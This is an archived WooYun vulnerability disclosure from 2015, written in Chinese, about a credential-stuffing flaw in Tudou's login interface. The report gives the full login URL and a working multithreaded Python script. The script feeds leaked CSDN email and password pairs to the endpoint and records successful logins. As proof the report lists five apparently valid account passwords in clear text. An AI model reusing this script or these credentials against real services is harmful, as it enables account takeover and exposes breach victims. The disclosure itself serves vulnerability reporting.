当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121803

漏洞标题:土豆某处设计缺陷存在撞库

相关厂商:土豆网

漏洞作者: jaffer

提交时间:2015-06-23 18:18

修复时间:2015-08-07 18:42

公开时间:2015-08-07 18:42

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-23: 细节已通知厂商并且等待厂商处理中
2015-06-23: 厂商已经确认,细节仅向厂商公开
2015-07-03: 细节向核心白帽子及相关领域专家公开
2015-07-13: 细节向普通白帽子公开
2015-07-23: 细节向实习白帽子公开
2015-08-07: 细节向公众公开

简要描述:

rt

详细说明:

接口:

http://login.tudou.com//passport/ytLogin.do?jsoncallback=jQuery17203996445555239916_1434721317917&loginname=test&passwd=test&remember=1&from=http%3A%2F%2F114.80.122.152%3A8080%2F&_=1434721510212'


对loginame和passwd进行爆破,没有限制,但是当重复提交次数超过500以上(具体多少没测试)会将IP地址进行限制。但是过一段时间又会解除限制。
python fuzz代码:

#!/usr/bin/env python
#-*-coding:utf-8-*-
import httplib2
import urllib2
import urllib
import socket
import socks
from urllib import urlopen
from string import replace,find,lower
from httplib import HTTPException
from urllib import urlencode
import time
import threadpool
import threading
import pdb
import traceback  
pdb.set_trace()
mutex = threading.Lock()
class fuzz(object):
	def __init__(self,user_pwd,count):
		self.user_pwd = user_pwd
		self.good = []
		self.count = count
		self.threadnum = 10
	def makePackage(self,euser,epwd):
		url = 'http://login.tudou.com//passport/ytLogin.do?jsoncallback=jQuery17203996445555239916_1434721317917&loginname='+euser+'&passwd='+epwd+'&remember=1&from=http%3A%2F%2F114.80.122.152%3A8080%2F&_=1434721510212'
		headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36',
		'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8'}
		
		h = httplib2.Http()
		try:
			res,con = h.request(url)
			
		except Exception,ex:
			print Exception,":",ex
			traceback.print_exc()  
			return
		i = con.find('success')
		t = []
		if i != -1:
			if mutex.acquire():
				self.good.append([euser,epwd])
				print euser+':'+epwd+'\n'			
				mutex.release()
		else:
			pass
	
	def preS(self):
		base = 0
		for each in self.user_pwd:
			self.makePackage(each[0],each[1][0:-1])
			if mutex.acquire():
				if len(self.good) != base:
					self.save()
					base = len(self.good)	
				mutex.release()
	
	def save(self):
		fp = open('result','w')
		for each in self.good:
			fp.writelines(each[0]+' '+each[1]+'\n')
		fp.close()
	
	def gothread(self):
		#建立进程池
		pool = threadpool.ThreadPool(self.threadnum)
		#两个list合并,直接相加就可以
		count = 0
		base = 0
		for i in range(self.count):
			print self.user_pwd[i][0]+'----user-----\n' + self.user_pwd[i][1] + '---pass---\n'
			if mutex.acquire():
				if len(self.good) != base:
					self.save()
					print 'OK\n'
					base = len(self.good)	
				mutex.release()
			pool.add_task(self.makePackage,self.user_pwd[i][0],self.user_pwd[i][1])
		#join and destroy all threads
		pool.destroy()
	
if __name__=='__main__':
	f = open('csdn_email','r')
	up = []
	count = 0
	while True:
		line = f.readline()
		if line:
			i = line.find(' ')
			user = line[0:i]
			pwd = line[i+1:]
			up.append([user,pwd])
			count = count + 1
		else:
			break
	f.close()
	test = fuzz(up,count)
	test.preS()

漏洞证明:

因为只测试一次,用csdn邮箱以及密码进行测试。
经过一轮测试得到的有效的用户密码:
[email protected] 730413
[email protected] jamstang
[email protected] Swhy920520
[email protected] my1316pass
[email protected] xinghong

1.png


2.jpg


3.jpg


4.png


修复方案:

防撞库

版权声明:转载请注明来源 jaffer@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-06-23 18:40

厂商回复:

已知问题,多谢。

最新状态:

暂无